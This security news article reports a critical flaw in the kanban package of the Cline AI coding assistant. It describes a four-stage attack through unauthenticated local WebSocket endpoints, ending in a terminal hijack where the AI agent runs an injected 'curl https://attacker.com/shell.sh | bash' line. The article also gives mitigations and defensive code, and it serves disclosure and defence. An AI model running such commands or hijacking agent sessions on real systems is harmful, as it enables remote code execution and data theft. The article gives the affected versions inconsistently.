GBHackers

Cline AI Agent Flaw Allows Attackers to Launch RCE Attacks


A critical security vulnerability in the Cline AI coding assistant’s kanban package exposes developers to remote code execution, data theft, and denial-of-service attacks when they simply visit a malicious website.

Security researcher Sagilayani disclosed CVE-2026-44211 on GitHub four days ago, revealing that the kanban npm package bundled with the Cline CLI starts a WebSocket server on 127.0.0.1:3484 with zero Origin header validation.

The flaw carries a CVSS v3.1 score of 9.3 (Critical) and affects all versions before v2.13.0, with no patch currently available.

Cline AI Agent Flaw

Unlike standard HTTP requests, WebSocket connections are not covered by browser CORS protections: the browser sends an Origin header with the handshake, but enforcing it is left to the server. This means any webpage a developer visits can silently connect to the local kanban server without restriction.

The attack unfolds in four stages:

  1. Info leak – A malicious webpage connects to ws://127.0.0.1:3484/api/runtime/ws and immediately receives a full snapshot of the developer’s workspace, including filesystem paths, git branch names, task titles, and live AI agent chat messages
  2. Session detection – The same WebSocket streams task_sessions_updated events, revealing when an AI agent session becomes active, along with its task ID and process ID
  3. Terminal hijack into RCE – The attacker connects to /api/terminal/io, injects an arbitrary prompt (e.g., curl https://attacker.com/shell.sh | bash) followed by a carriage return, and the AI agent executes it as a user command
  4. Task termination (DoS) – The /api/terminal/control endpoint allows the attacker to kill any running agent session with a simple {"type": "stop"} message

All three vulnerable endpoints – /api/runtime/ws, /api/terminal/io, and /api/terminal/control – require no authentication and perform no Origin validation.

The vulnerability stems from two weaknesses: CWE-306 (Missing Authentication for Critical Function) and CWE-1385 (Missing Origin Validation in WebSockets).

The server’s upgrade handler processes WebSocket connections without checking whether the request originates from the legitimate kanban UI or an external attacker-controlled page.

The attack requires only that the victim have Cline’s kanban server running and visit any attacker-controlled webpage; no additional user interaction is needed. The researcher confirmed the vulnerability across macOS, Linux, and Windows, tested on Firefox, Chrome, and Arc browsers.

  • Confidentiality: Workspace paths, git data, and AI chat messages leak in real-time
  • Integrity: Arbitrary shell commands execute inside the developer’s environment via terminal hijack
  • Availability: Active agent tasks can be silently terminated at will

A proof-of-concept demonstrating the full attack chain, including a macOS native dialog as proof of execution, was published alongside the disclosure.

At the time of publication, no patched version of the kanban package exists. The researcher recommends three mitigations the Cline team should implement:

  • Validate the Origin header on all WebSocket upgrade requests, rejecting non-localhost origins
  • Generate a random secret token at server startup and require it as a query parameter on all WebSocket connections
  • Add authentication checks to terminal WebSocket endpoints to verify the connecting client is the legitimate kanban UI
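The first two mitigations can be combined in a single gate on the HTTP server's upgrade event. The sketch below is an added example, not code from Cline or the kanban package; the allowed UI origins, the `token` query parameter name and all function names are assumptions made for illustration.

```javascript
// Added example: gate for WebSocket upgrade requests (Origin allowlist + startup token).
const crypto = require('node:crypto');

const PORT = 3484; // port named in the advisory
// Assumption: the legitimate kanban UI is served from the same local port.
const ALLOWED_ORIGINS = new Set([`http://127.0.0.1:${PORT}`, `http://localhost:${PORT}`]);
const PROTECTED_PATHS = new Set(['/api/runtime/ws', '/api/terminal/io', '/api/terminal/control']);

// Random per-process secret; the server would hand it only to its own UI page.
function newStartupToken() {
  return crypto.randomBytes(32).toString('hex');
}

// Compare fixed-length digests so timingSafeEqual never sees unequal lengths.
function tokenMatches(presented, expected) {
  const h = (s) => crypto.createHash('sha256').update(String(s)).digest();
  return crypto.timingSafeEqual(h(presented), h(expected));
}

// Decide on one upgrade request; `req` needs only `url` and `headers` (as on http.IncomingMessage).
function checkUpgrade(req, expectedToken) {
  const url = new URL(req.url, `http://127.0.0.1:${PORT}`);
  if (!PROTECTED_PATHS.has(url.pathname)) {
    return { ok: false, status: 404, reason: 'unknown endpoint' };
  }
  const origin = req.headers.origin;
  // Browsers always send Origin on a WebSocket handshake, so a page from another site
  // is refused here. Non-browser clients omit it and must still pass the token check.
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    return { ok: false, status: 403, reason: 'origin not allowed' };
  }
  const presented = url.searchParams.get('token'); // hypothetical parameter name
  if (presented === null || !tokenMatches(presented, expectedToken)) {
    return { ok: false, status: 401, reason: 'missing or bad token' };
  }
  return { ok: true, status: 101, reason: 'accepted' };
}

// Wire into a Node http.Server: refuse before any WebSocket library sees the socket.
function guardUpgrades(server, expectedToken, onAccepted) {
  server.on('upgrade', (req, socket, head) => {
    const verdict = checkUpgrade(req, expectedToken);
    if (!verdict.ok) {
      socket.end(`HTTP/1.1 ${verdict.status} Rejected\r\nConnection: close\r\n\r\n`);
      return;
    }
    onAccepted(req, socket, head);
  });
}
```

The Origin check alone stops cross-site pages in a browser; the token additionally covers local clients that send no Origin header at all.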

Developers using Cline v2.13.0 or earlier with the kanban feature enabled should avoid running the kanban server in untrusted network environments until a fix is released.
